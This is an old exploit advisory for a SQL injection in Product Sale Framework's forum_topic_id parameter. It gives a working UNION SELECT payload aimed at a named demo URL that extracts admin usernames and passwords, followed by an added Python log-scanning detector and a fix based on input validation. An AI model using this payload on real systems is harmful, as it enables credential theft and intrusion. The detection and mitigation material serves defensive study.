+++++++++++++++++++++++In The Name Of Allah+++++++++++++++++++++++++++
+                                                                    +
+         Product Sale Framework SQL Injection Vulnerability         +
+                                                                    +
+                        Discovered by b3hz4d                        +
+                                                                    +
+                        WwW.DeltaHacking.Net                        +
+                                                                    +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
APA Center of Yazd University
(https://www.ircert.cc)
AUTHOR : b3hz4d (Seyed Behzad Shaghasemi)
DATE : 06 Dec 2008
SITE : WwW.DeltaHacking.Net
CONTACT: behzad_sh_66@yahoo.com
#####################################################
APPLICATION : Product Sale Framework v0.1 beta
DOWNLOAD(free): http://www.productsaleframework.com/downloads/psf.zip
VENDOR : http://www.productsaleframework.com
DEMO (links) : http://www.productsaleframework.com
#####################################################
[+] Vuln :
customer.forumtopic.php
The vulnerability is in the forum (the forum_topic_id parameter of this script). All demo links (Admin demo, Affiliate demo, Customer demo) are here:
http://www.productsaleframework.com/
[+] Exploit :
Admin Username and Password:
http://www.kalptarudemos.com/demo/psf/customer/customer.forumtopic.php?forum_topic_id=-1 union select concat(username,0x3a,password),2,3,4,5,6 from psf_config_tb
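
[+] Detection (added example, not part of the original advisory or of Product Sale Framework):
A legitimate forum_topic_id is a plain integer, so any request to customer.forumtopic.php carrying anything else in that parameter stands out in the web server access log. The log format (combined) and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

TARGET_SCRIPT = "customer.forumtopic.php"  # vulnerable script named in the advisory
PARAM = "forum_topic_id"                   # injectable parameter named in the advisory
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def is_valid_topic_id(value):
    """A legitimate topic id is a short run of ASCII digits and nothing else."""
    return re.fullmatch(r"[0-9]{1,10}", value) is not None


def suspicious_requests(log_lines):
    """Return (client_ip, decoded_value) for every request to the script whose
    forum_topic_id is not a plain non-negative integer."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/" + TARGET_SCRIPT):
            continue
        # parse_qs URL-decodes the value, so %20 and + both become spaces
        for value in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
            if not is_valid_topic_id(value):
                hits.append((line.split(" ", 1)[0], value))
    return hits


# Constructed sample lines (combined log format), not taken from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Dec/2008:10:00:01 +0000] "GET /demo/psf/customer/'
    'customer.forumtopic.php?forum_topic_id=12 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [07/Dec/2008:10:00:09 +0000] "GET /demo/psf/customer/'
    'customer.forumtopic.php?forum_topic_id=-1%20union%20select%20concat('
    'username,0x3a,password),2,3,4,5,6%20from%20psf_config_tb HTTP/1.1" 200 734',
    '192.0.2.10 - - [07/Dec/2008:10:00:15 +0000] "GET /demo/psf/customer/'
    'customer.php HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for ip, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} sent non-numeric {PARAM}: {value!r}")
```

The same digits-only check, enforced inside customer.forumtopic.php before the value reaches the query and combined with a parameterized query, removes the injection point.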
###########################################################################################################
# Greetings: str0ke, Dr.Trojan, Cru3l.b0y, l0pht and all members in DeltaHacking.Net & Snoop-Security.Com #
###########################################################################################################
# milw0rm.com [2008-12-07]